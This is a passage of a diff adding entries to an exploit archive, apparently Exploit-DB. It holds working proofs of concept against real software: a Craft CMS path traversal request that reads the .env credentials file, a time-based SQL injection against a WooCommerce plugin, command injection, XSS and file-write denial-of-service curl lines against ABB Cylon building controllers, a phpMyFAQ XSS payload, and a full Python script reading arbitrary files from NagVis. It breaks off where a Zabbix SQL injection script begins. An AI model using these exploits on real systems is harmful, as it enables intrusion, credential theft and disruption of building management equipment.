1) Authenticated Path Traversal (CVE-2022-23409)
|
||||
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
|
||||
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
|
||||
able to request arbitrary files from the underlying file system with the permissions of the
|
||||
web service user.
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) Authenticated Path Traversal (CVE-2022-23409)
|
||||
As the plugin is installed as an administrator of the system and the function is only accessible
|
||||
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
|
||||
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
|
||||
The vulnerable endpoint is provided by the plugin under the following path:
|
||||
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
|
||||
The vulnerable controller for that endpoint can be found here:
|
||||
https://github.com/ethercreative/logs/blob/master/src/Controller.php
|
||||
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
|
||||
values before file content is being read by the function "file_get_contents".
|
||||
public function actionStream ()
|
||||
{
|
||||
$logsDir = \Craft::getAlias('@storage/logs');
|
||||
$logFile = \Craft::$app->request->getParam('log');
|
||||
$currentLog = \Craft::$app->request->get('log', $logFile);
|
||||
$log = file_get_contents($logsDir . '/' . $currentLog);
|
||||
exit($log);
|
||||
}
|
||||
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
|
||||
with rights as the user executing the web server. In most cases this will be the user "www-data".
|
||||
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
|
||||
such also the database credentials, the following request can be used:
|
||||
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
|
||||
Host: <host>
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Connection: close
|
||||
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
|
||||
The response then discloses the file content of the file ".env":
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 07 Jul 2021 10:08:52 GMT
|
||||
Server: nginx
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
|
||||
Content-Length: 1600
|
||||
Connection: close
|
||||
[...]
|
||||
$craftEnvVars = [
|
||||
'DB_DRIVER' => 'mysql',
|
||||
'DB_SERVER' => '********',
|
||||
'DB_USER' => '********',
|
||||
'DB_PASSWORD' => '********',
|
||||
'DB_DATABASE' => '********',
|
||||
'DB_SCHEMA' => 'public',
|
||||
'DB_TABLE_PREFIX' => '',
|
||||
'DB_PORT' => '********',
|
||||
'SECURITY_KEY' => '********',
|
||||
[...]
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
The following version has been tested which was the latest version available at the time
|
||||
of the test:
|
||||
* Version 3.0.3 released on November 25, 2019
|
||||
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
|
||||
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
|
||||
for any risks involved with plaintext communication
|
||||
2021-07-08: Advisory was sent to vendor unencrypted
|
||||
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
|
||||
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
|
||||
2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
|
||||
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
|
||||
2022-01-24: Release of security advisory
|
||||
Solution:
|
||||
---------
|
||||
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
|
||||
website/github:
|
||||
https://plugins.craftcms.com/logs
|
||||
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
|
||||
Workaround:
|
||||
-----------
|
||||
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://sec-consult.com/vulnerability-lab/
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
SEC Consult Vulnerability Lab
|
||||
SEC Consult, an Atos company
|
||||
Europe | Asia | North America
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
|
||||
Atos company. It ensures the continued knowledge gain of SEC Consult in the
|
||||
field of network and application security to stay ahead of the attacker. The
|
||||
SEC Consult Vulnerability Lab supports high-quality penetration testing and
|
||||
the evaluation of new offensive and defensive technologies for our customers.
|
||||
Hence our customers obtain the most current information about vulnerabilities
|
||||
and valid recommendation about the risk profile of new technologies.
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://sec-consult.com/career/
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://sec-consult.com/contact/
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Mail: research at sec-consult dot com
|
||||
Web: https://www.sec-consult.com
|
||||
Blog: http://blog.sec-consult.com
|
||||
Twitter: https://twitter.com/sec_consult
|
||||
EOF Steffen Rogge / @2022
|
91
exploits/multiple/webapps/52248.txt
Normal file
91
exploits/multiple/webapps/52248.txt
Normal file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
|
||||
# Date: 2024-03-25
|
||||
# Exploit Author: Ivan Spiridonov - xbz0n
|
||||
# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432
|
||||
# Version: 29.4
|
||||
# Tested on: Ubuntu 22.04
|
||||
# CVE: CVE-2024-0399
|
||||
|
||||
## SQL Injection
|
||||
|
||||
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
|
||||
|
||||
## Affected Components
|
||||
|
||||
- **Plugin:** WooCommerce Customers Manager
|
||||
- **Version:** 29.4
|
||||
- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
|
||||
- **Affected Endpoint:** /wp-admin/admin-ajax.php
|
||||
|
||||
## Description
|
||||
|
||||
The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.
|
||||
|
||||
## Proof of Concept
|
||||
|
||||
### Manual Exploitation
|
||||
|
||||
```http
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
|
||||
Content-Length: 1877
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="action"
|
||||
wccm_get_orders_tot_num
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="start_date"
|
||||
2024-01-09
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="end_date"
|
||||
2024-01-11
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="customer_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="category_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="min_amount"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="max_amount"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="min_amount_total"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="max_amount_total"
|
||||
(select*from(select(sleep(20)))a)
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_relationship"
|
||||
or
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_category_relationship"
|
||||
or
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_category_filters_relationship"
|
||||
and
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="statuses"
|
||||
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
|
||||
-----------------------------2461714219322283440478088295--
|
||||
```
|
||||
|
||||
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
|
||||
|
||||
## Recommendations
|
||||
|
||||
Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.
|
79
exploits/php/hardware/52232.txt
Normal file
79
exploits/php/hardware/52232.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=4.00.00
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
|
||||
blind command injection vulnerability. Input passed to the serial and ManufactureDate
|
||||
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
|
||||
shell commands on the system. While factory test scripts included in the upgrade
|
||||
bundle are typically deleted, a short window for exploitation exists when the device
|
||||
is in the manufacturing phase.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5894
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ curl http://192.168.73.31/factorySetSerialNum.php \
|
||||
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
|
79
exploits/php/hardware/52233.txt
Normal file
79
exploits/php/hardware/52233.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=4.00.00
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
|
||||
reflected cross-site scripting vulnerability in the 'title' GET parameter.
|
||||
Input is not properly sanitized before being returned to the user, allowing
|
||||
the execution of arbitrary HTML/JS code in a user's browser session in the
|
||||
context of the affected site. While the factory test scripts included in the
|
||||
upgrade bundle are typically deleted, a short window for exploitation exists
|
||||
when the device is in the manufacturing phase.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5893
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
|
83
exploits/php/hardware/52234.txt
Normal file
83
exploits/php/hardware/52234.txt
Normal file
|
@ -0,0 +1,83 @@
|
|||
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=3.08.03
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
|
||||
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
|
||||
script due to a lack of input validation. Authenticated attackers can exploit
|
||||
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
|
||||
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
|
||||
service.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5892
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
|
||||
> -H "Cookie: PHPSESSID=xxx" \
|
||||
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
|
||||
> # --data-urlencode "deviceLabel@largecontent.txt"
|
||||
|
||||
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
|
28
exploits/php/webapps/52226.txt
Normal file
28
exploits/php/webapps/52226.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
|
||||
# Date: 2024-10-26
|
||||
# Exploit Author: CodeSecLab
|
||||
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
|
||||
# Software Link: https://github.com/thorsten/phpMyFAQ
|
||||
# Version: 3.1.7
|
||||
# Tested on: Ubuntu Windows
|
||||
# CVE : CVE-2022-4407
|
||||
|
||||
PoC:
|
||||
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
|
||||
|
||||
Details:
|
||||
{
|
||||
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
|
||||
"Vulnerable Variable": "action",
|
||||
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
|
||||
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
|
||||
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
|
||||
"Attack Payload": "\"><script>alert('XSS')</script>",
|
||||
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
|
||||
"Request Parameters": "action",
|
||||
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
|
||||
"Request Method": "GET",
|
||||
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
|
||||
}
|
||||
|
||||
[Replace Your Domain Name]
|
74
exploits/php/webapps/52229.py
Executable file
74
exploits/php/webapps/52229.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
|
||||
# Date: 03/12/2024
|
||||
# Exploit Author: David Rodríguez a.k.a. xerosec
|
||||
# Vendor Homepage: https://www.nagvis.org/
|
||||
# Software Link: https://www.nagvis.org/downloads/archive
|
||||
# Version: 1.9.33
|
||||
# Tested on: Linux
|
||||
# CVE: CVE-2022-46945
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import json
|
||||
from urllib.parse import urljoin
|
||||
|
||||
def authenticate(target_url, username, password):
|
||||
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
|
||||
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
|
||||
data = {"_username": username, "_password": password, "submit": "Login"}
|
||||
|
||||
try:
|
||||
response = requests.post(url, headers=headers, data=data)
|
||||
if response.status_code == 200 and "Set-Cookie" in response.headers:
|
||||
print("[✔] Authentication successful.")
|
||||
return response.headers["Set-Cookie"]
|
||||
print(f"[✘] Authentication failed. Status code: {response.status_code}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Request error: {e}")
|
||||
return None
|
||||
|
||||
def exploit(target_url, session_cookie, file_path):
|
||||
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
|
||||
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
|
||||
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
|
||||
|
||||
try:
|
||||
response = requests.get(url, headers=headers, params=params)
|
||||
if response.status_code == 200:
|
||||
print("[✔] Exploitation successful. File content:\n")
|
||||
display_file_content(response.text)
|
||||
else:
|
||||
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Request error: {e}")
|
||||
|
||||
def display_file_content(raw_response):
|
||||
try:
|
||||
data = json.loads(raw_response)
|
||||
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
|
||||
content = data[0]["code"]
|
||||
# Decodificar escapes de manera segura
|
||||
content = content.encode('utf-8').decode('unicode_escape')
|
||||
print(content.strip())
|
||||
else:
|
||||
print("[✘] Unexpected JSON structure.")
|
||||
except json.JSONDecodeError as jde:
|
||||
print(f"[✘] JSON decoding error: {jde}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Unexpected error during output processing: {e}")
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
|
||||
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
|
||||
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
|
||||
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
|
||||
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
session_cookie = authenticate(args.target, args.username, args.password)
|
||||
if session_cookie:
|
||||
exploit(args.target, session_cookie, args.file)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
63
exploits/php/webapps/52230.py
Executable file
63
exploits/php/webapps/52230.py
Executable file
|
@ -0,0 +1,63 @@
|
|||
# Exploit Title: Zabbix 7.0.0 - SQL Injection
|
||||
# Date: 06/12/2024
|
||||
# Exploit Author: Leandro Dias Barata @m4nb4
|
||||
# Vendor Homepage: https://www.zabbix.com/
|
||||
# Software Link: https://support.zabbix.com/browse/ZBX-25623
|
||||
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
|
||||
# Tested on: Kali Linux kali-linux-2024.3
|
||||
# CVE: CVE-2024-42327
|
||||
|
||||
import requests
